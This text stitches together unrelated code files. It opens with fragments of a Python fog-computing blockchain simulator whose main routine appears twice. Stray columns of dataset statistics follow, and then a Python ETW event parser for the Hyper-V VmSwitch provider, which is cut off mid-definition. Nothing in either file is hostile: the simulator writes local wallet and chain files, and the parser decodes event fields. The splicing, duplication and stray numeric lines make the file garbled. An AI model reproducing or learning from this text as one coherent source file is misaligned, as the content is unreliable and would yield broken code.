output.block_info(genesis_block, type_of_consensus)
for elem in miner_list:
elem.receive_new_block(genesis_block, type_of_consensus, miner_list, blockchainFunction,
expected_chain_length)
output.genesis_block_generation()
def send_tasks_to_BC():
for node in fogNodes:
node.send_tasks_to_BC()
def inform_miners_of_users_wallets():
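# blockchainFunction == 3 is the Payment option (see choose_functionality), so
# each miner receives a local record of every end-user's wallet value.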
if blockchainFunction == 3:
user_wallets = {}
for user in list_of_end_users:
wallet_info = {'parent': user.addressParent,
'self': user.addressSelf,
'wallet_value': user.wallet}
user_wallets[str(user.addressParent) + '.' + str(user.addressSelf)] = wallet_info
for i in range(len(miner_list)):
modification.rewrite_file(str("temporary/" + miner_list[i].address + "_users_wallets.json"),
user_wallets)
if __name__ == '__main__':
user_input()
initiate_network()
type_of_consensus = new_consensus_module.choose_consensus()
trans_delay = define_trans_delay(blockchainPlacement)
miner_list = initiate_miners()
give_miners_authorization(miner_list, type_of_consensus)
inform_miners_of_users_wallets()
blockchain.stake(miner_list, type_of_consensus)
initiate_genesis_block()
send_tasks_to_BC()
time_start = time.time()
if blockchainFunction == 2:
expected_chain_length = ceil((num_of_users_per_fog_node * NumOfTaskPerUser * NumOfFogNodes))
new_consensus_module.miners_trigger(miner_list, type_of_consensus, expected_chain_length, Parallel_PoW_mining,
numOfTXperBlock, blockchainFunction, poet_block_time, Asymmetric_key_length,
number_of_DPoS_delegates)
blockchain.award_winning_miners(len(miner_list))
blockchain.fork_analysis(miner_list)
output.finish()
elapsed_time = time.time() - time_start
print("elapsed time = " + str(elapsed_time) + " seconds")
import Fog
import end_user
import miner
import blockchain
import random
import output
from math import ceil
import time
import modification
import new_consensus_module
data = modification.read_file("Sim_parameters.json")
list_of_end_users = []
fogNodes = []
transactions_list = []
list_of_authorized_miners = []
blockchainFunction = 0
blockchainPlacement = 0
number_of_miner_neighbours = data["number_of_each_miner_neighbours"]
NumOfFogNodes = data["NumOfFogNodes"]
NumOfTaskPerUser = data["NumOfTaskPerUser"]
NumOfMiners = data["NumOfMiners"]
numOfTXperBlock = data["numOfTXperBlock"]
num_of_users_per_fog_node = data["num_of_users_per_fog_node"]
blockchain_functions = ['1', '2', '3', '4']
blockchain_placement_options = ['1', '2']
expected_chain_length = ceil((num_of_users_per_fog_node * NumOfTaskPerUser * NumOfFogNodes) / numOfTXperBlock)
gossip_activated = data["Gossip_Activated"]
Automatic_PoA_miners_authorization = data["Automatic_PoA_miners_authorization?"]
Parallel_PoW_mining = data["Parallel_PoW_mining?"]
trans_delay = 0
delay_between_fog_nodes = data["delay_between_fog_nodes"]
delay_between_end_users = data["delay_between_end_users"]
poet_block_time = data['poet_block_time']
Asymmetric_key_length = data['Asymmetric_key_length']
number_of_DPoS_delegates = data['Num_of_DPoS_delegates']
def user_input():
modification.initiate_files(gossip_activated)
choose_functionality()
choose_placement()
def choose_functionality():
while True:
output.choose_functionality()
global blockchainFunction
blockchainFunction = input()
if blockchainFunction in blockchain_functions:
blockchainFunction = int(blockchainFunction)
break
else:
print("Input is incorrect, try again..!")
def choose_placement():
while True:
output.choose_placement()
global blockchainPlacement
blockchainPlacement = input()
if blockchainPlacement in blockchain_placement_options:
blockchainPlacement = int(blockchainPlacement)
break
else:
print("Input is incorrect, try again..!")
def initiate_network():
for count in range(NumOfFogNodes):
fogNodes.append(Fog.Fog(count + 1))
for p in range(num_of_users_per_fog_node):
list_of_end_users.append(end_user.User(p + 1, count + 1))
output.users_and_fogs_are_up()
if blockchainFunction == 4:
output.GDPR_warning()
while True:
print("If you don't want other attributes to be added to end_users, input: done\n")
new_attribute = input("If you want other attributes to be added to end_users, input them next:\n")
if new_attribute == 'done':
break
else:
for user in list_of_end_users:
user.identity_added_attributes[new_attribute] = ''
output.user_identity_addition_reminder(len(list_of_end_users))
for user in list_of_end_users:
user.create_tasks(NumOfTaskPerUser, blockchainFunction, list_of_end_users)
user.send_tasks(fogNodes)
print("End_user " + str(user.addressParent) + "." + str(user.addressSelf) + " had sent its tasks to the fog layer")
def initiate_miners():
the_miners_list = []
if blockchainPlacement == 1:
for i in range(NumOfFogNodes):
the_miners_list.append(miner.Miner(i + 1, trans_delay, gossip_activated))
if blockchainPlacement == 2:
for i in range(NumOfMiners):
the_miners_list.append(miner.Miner(i + 1, trans_delay, gossip_activated))
for entity in the_miners_list:
modification.write_file("temporary/" + entity.address + "_local_chain.json", {})
miner_wallets_log_py = modification.read_file("temporary/miner_wallets_log.json")
miner_wallets_log_py[str(entity.address)] = data['miners_initial_wallet_value']
modification.rewrite_file("temporary/miner_wallets_log.json", miner_wallets_log_py)
print('Miners have been initiated..')
connect_miners(the_miners_list)
output.miners_are_up()
return the_miners_list
def define_trans_delay(layer):
transmission_delay = 0
if layer == 1:
transmission_delay = delay_between_fog_nodes
if layer == 2:
transmission_delay = delay_between_end_users
return transmission_delay
def connect_miners(miners_list):
print("Miners will be connected in a P2P fashion now. Hold on...")
bridges = set()
all_components = create_components(miners_list)
for comp in all_components:
bridge = random.choice(tuple(comp))
bridges.add(bridge)
bridging(bridges, miners_list)
def bridging(bridges, miners_list):
while len(bridges) != 1:
bridge = random.choice(tuple(bridges))
other_bridge = random.choice(tuple(bridges))
same_bridge = True
while same_bridge:
other_bridge = random.choice(tuple(bridges))
if other_bridge != bridge:
same_bridge = False
for entity in miners_list:
if entity.address == bridge:
entity.neighbours.add(other_bridge)
if entity.address == other_bridge:
entity.neighbours.add(bridge)
bridges.remove(bridge)
def create_components(miners_list):
all_components = set()
for entity in miners_list:
component = set()
while len(entity.neighbours) < number_of_miner_neighbours:
neighbour = random.choice(miners_list).address
if neighbour != entity.address:
entity.neighbours.add(neighbour)
component.add(neighbour)
for entity_2 in miners_list:
if entity_2.address == neighbour:
entity_2.neighbours.add(entity.address)
component.add(entity.address)
break
if component:
all_components.add(tuple(component))
return all_components
def give_miners_authorization(the_miners_list, the_type_of_consensus):
if the_type_of_consensus == 3:
# automated approach:
if Automatic_PoA_miners_authorization:
for i in range(len(the_miners_list)):
the_miners_list[i].isAuthorized = True
list_of_authorized_miners.append(the_miners_list[i])
else:
# user input approach:
output.authorization_trigger(blockchainPlacement, NumOfFogNodes, NumOfMiners)
while True:
authorized_miner = input()
if authorized_miner == "done":
break
else:
for node in the_miners_list:
if node.address == "Miner_" + authorized_miner:
node.isAuthorized = True
list_of_authorized_miners.append(node)
def initiate_genesis_block():
genesis_transactions = ["genesis_block"]
for i in range(len(miner_list)):
genesis_transactions.append(miner_list[i].address)
genesis_block = new_consensus_module.generate_new_block(genesis_transactions, 'The Network', 0, type_of_consensus)
output.block_info(genesis_block, type_of_consensus)
for elem in miner_list:
elem.receive_new_block(genesis_block, type_of_consensus, miner_list, blockchainFunction, expected_chain_length)
output.genesis_block_generation()
def send_tasks_to_BC():
for node in fogNodes:
node.send_tasks_to_BC()
def inform_miners_of_users_wallets():
if blockchainFunction == 3:
user_wallets = {}
for user in list_of_end_users:
wallet_info = {'parent': user.addressParent,
'self': user.addressSelf,
'wallet_value': user.wallet}
user_wallets[str(user.addressParent) + '.' + str(user.addressSelf)] = wallet_info
for i in range(len(miner_list)):
modification.rewrite_file(str("temporary/" + miner_list[i].address + "_users_wallets.json"), user_wallets)
def main_function():
user_input()
initiate_network()
type_of_consensus = new_consensus_module.choose_consensus()
trans_delay = define_trans_delay(blockchainPlacement)
miner_list = initiate_miners()
give_miners_authorization(miner_list, type_of_consensus)
inform_miners_of_users_wallets()
blockchain.stake(miner_list, type_of_consensus)
initiate_genesis_block()
send_tasks_to_BC()
time_start = time.time()
if blockchainFunction == 2:
expected_chain_length = ceil((num_of_users_per_fog_node * NumOfTaskPerUser * NumOfFogNodes))
new_consensus_module.miners_trigger(miner_list, type_of_consensus, expected_chain_length, Parallel_PoW_mining,
numOfTXperBlock, blockchainFunction, poet_block_time, Asymmetric_key_length,
number_of_DPoS_delegates)
blockchain.award_winning_miners(len(miner_list))
blockchain.fork_analysis(miner_list)
output.finish()
elapsed_time = time.time() - time_start
print("elapsed time = " + str(elapsed_time) + " seconds")
| 41.393312
| 184
| 0.628159
| 2,943
| 25,995
| 5.265036
| 0.114849
| 0.025815
| 0.018458
| 0.012649
| 0.770248
| 0.76244
| 0.759342
| 0.759342
| 0.759342
| 0.759342
| 0
| 0.004029
| 0.274284
| 25,995
| 627
| 185
| 41.45933
| 0.817334
| 0.010771
| 0
| 0.779886
| 1
| 0.003795
| 0.192464
| 0.038198
| 0
| 0
| 0
| 0
| 0
| 1
| 0.094877
| false
| 0.001898
| 0.037951
| 0
| 0.144213
| 0.140417
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4660adcfcbd99abbfdd8505ab169c661e78e26b4
| 135,717
|
py
|
Python
|
etl/parsers/etw/Microsoft_Windows_Hyper_V_VmSwitch.py
|
IMULMUL/etl-parser
|
76b7c046866ce0469cd129ee3f7bb3799b34e271
|
[
"Apache-2.0"
] | 104
|
2020-03-04T14:31:31.000Z
|
2022-03-28T02:59:36.000Z
|
etl/parsers/etw/Microsoft_Windows_Hyper_V_VmSwitch.py
|
IMULMUL/etl-parser
|
76b7c046866ce0469cd129ee3f7bb3799b34e271
|
[
"Apache-2.0"
] | 7
|
2020-04-20T09:18:39.000Z
|
2022-03-19T17:06:19.000Z
|
etl/parsers/etw/Microsoft_Windows_Hyper_V_VmSwitch.py
|
IMULMUL/etl-parser
|
76b7c046866ce0469cd129ee3f7bb3799b34e271
|
[
"Apache-2.0"
] | 16
|
2020-03-05T18:55:59.000Z
|
2022-03-01T10:19:28.000Z
|
# -*- coding: utf-8 -*-
"""
Microsoft-Windows-Hyper-V-VmSwitch
GUID : 67dc0d66-3695-47c0-9642-33f76f7bd7ad
"""
from construct import Int8sl, Int8ul, Int16ul, Int16sl, Int32sl, Int32ul, Int64sl, Int64ul, Bytes, Double, Float32l, Struct
from etl.utils import WString, CString, SystemTime, Guid
from etl.dtyp import Sid
from etl.parsers.etw.core import Etw, declare, guid
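# Each class below maps one ETW event of this provider (GUID above, keyed by
# event_id and version) to a construct Struct. Variable-length string fields
# are length-prefixed, hence every "<Field>Len" / Int32ul entry followed by a
# "<Field>" / Bytes(lambda this: this.<Field>Len) entry.
#
# Hypothetical usage sketch (raw_payload is assumed to be the event's user
# data as bytes):
#   parsed = Microsoft_Windows_Hyper_V_VmSwitch_1_0.pattern.parse(raw_payload)
#   print(parsed.Status)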
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=1, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_1_0(Etw):
pattern = Struct(
"Status" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=2, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_2_0(Etw):
pattern = Struct(
"Status" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=3, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_3_0(Etw):
pattern = Struct(
"Status" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=4, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_4_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=5, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_5_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=6, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_6_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=7, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_7_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=8, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_8_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=9, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_9_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Flags" / Int32ul,
"OwnerService" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=10, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_10_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=11, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_11_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=12, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_12_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=13, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_13_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=14, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_14_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=15, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_15_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=16, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_16_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=17, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_17_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=18, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_18_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=19, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_19_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=20, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_20_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=21, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_21_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=22, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_22_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=23, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_23_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=24, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_24_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=25, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_25_0(Etw):
pattern = Struct(
"MacAddressLen" / Int32ul,
"MacAddress" / Bytes(lambda this: this.MacAddressLen),
"Port1NameLen" / Int32ul,
"Port1Name" / Bytes(lambda this: this.Port1NameLen),
"Port1FNameLen" / Int32ul,
"Port1FName" / Bytes(lambda this: this.Port1FNameLen),
"Port2NameLen" / Int32ul,
"Port2Name" / Bytes(lambda this: this.Port2NameLen),
"Port2FNameLen" / Int32ul,
"Port2FName" / Bytes(lambda this: this.Port2FNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=26, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_26_0(Etw):
pattern = Struct(
"VMNameLen" / Int32ul,
"VMName" / Bytes(lambda this: this.VMNameLen),
"VMIdLen" / Int32ul,
"VMId" / Bytes(lambda this: this.VMIdLen),
"ServerVersionLen" / Int32ul,
"ServerVersion" / Bytes(lambda this: this.ServerVersionLen),
"ClientVersionLen" / Int32ul,
"ClientVersion" / Bytes(lambda this: this.ClientVersionLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=28, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_28_0(Etw):
pattern = Struct(
"MacAddressLen" / Int32ul,
"MacAddress" / Bytes(lambda this: this.MacAddressLen),
"Port1NameLen" / Int32ul,
"Port1Name" / Bytes(lambda this: this.Port1NameLen),
"Port1FNameLen" / Int32ul,
"Port1FName" / Bytes(lambda this: this.Port1FNameLen),
"Port2NameLen" / Int32ul,
"Port2Name" / Bytes(lambda this: this.Port2NameLen),
"Port2FNameLen" / Int32ul,
"Port2FName" / Bytes(lambda this: this.Port2FNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=29, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_29_0(Etw):
pattern = Struct(
"MacAddressLen" / Int32ul,
"MacAddress" / Bytes(lambda this: this.MacAddressLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=30, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_30_0(Etw):
pattern = Struct(
"MacAddressLen" / Int32ul,
"MacAddress" / Bytes(lambda this: this.MacAddressLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=31, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_31_0(Etw):
pattern = Struct(
"MacAddressLen" / Int32ul,
"MacAddress" / Bytes(lambda this: this.MacAddressLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=32, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_32_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=33, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_33_0(Etw):
pattern = Struct(
"VMNameLen" / Int32ul,
"VMName" / Bytes(lambda this: this.VMNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=34, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_34_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=35, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_35_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=36, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_36_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"AclNameLen" / Int32ul,
"AclName" / Bytes(lambda this: this.AclNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=37, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_37_0(Etw):
pattern = Struct(
"IpsecOffloadInboundDropReason" / Int32ul,
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"DestAddressLen" / Int32ul,
"DestAddress" / Bytes(lambda this: this.DestAddressLen),
"SPI" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=38, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_38_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"DestAddressLen" / Int32ul,
"DestAddress" / Bytes(lambda this: this.DestAddressLen),
"SPI" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=39, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_39_0(Etw):
pattern = Struct(
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"OffloadHandle" / Int64ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=40, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_40_0(Etw):
pattern = Struct(
"IpsecSaOffloadFailureReason" / Int32ul,
"PortNameLen" / Int32ul,
